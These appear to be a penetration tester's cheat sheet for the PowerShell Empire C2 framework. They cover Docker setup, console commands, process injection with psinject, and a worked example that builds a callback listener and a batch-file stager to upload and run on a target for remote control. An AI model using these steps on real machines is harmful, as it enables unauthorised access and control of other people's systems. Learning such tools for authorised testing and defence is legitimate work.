PowerShell empire is a penetration testing framework based on PowerShell and Python.

Do not use PowerShell empire

PowerShell Empire is obsolete by modern standards due to increased monitoring on PowerShell by many EDR solutions.

Setup

Kali should have a working version installed already. DO NOT upgrade otherwise it will mess up the Python version and break the script.

If it doesn’t work anymore then use the docker image.

# in root shell
apt update && apt install docker.io jq
docker pull empireproject/empire
docker volume create empire-data
mkdir -p /opt/Empire/ && ln -s $(docker volume inspect empire-data \ 
| jq -r .[0].Mountpoint) /opt/Empire/data
docker run -it --name empire -v empire-data:/opt/Empire/data \
 -p 443:443 --entrypoint bash empireproject/empire
 # to start image next time: docker start -ai empire

General

Tools

  • useTOOL: enter TOOL context, e.g. uselistener
  • useTOOL NAME: select a tool
  • info: show general info and options for current activated tool
  • set OPTION VALUE: set an option
  • execute: start tool
  • back: leave current context

Agents

  • agent: list active agents (compromised machines)
  • interact AGENT_NAME: interact with agent / execute commands
  • sysinfo: display agent info
  • ps: list procersses
  • psinject LISTENER PID: migrate to a given PID and communicate using the given listener (has to manually switch to newly created agent after migration completes)

Types of Tools

Listener: handles incoming connections from payloads Stager: Generate payload

Listener and Stager Example

# in empire
listeners
uselistener http
set Host 192.168.131.10
execute
back
usestager windows/launcher_bat
set Listener http
execute
 
# now upload and execute /tmp/launcher.bat
 
# in empire, once an agent connects
agents # look for new agent name
interact ABCD1234
 
# type away~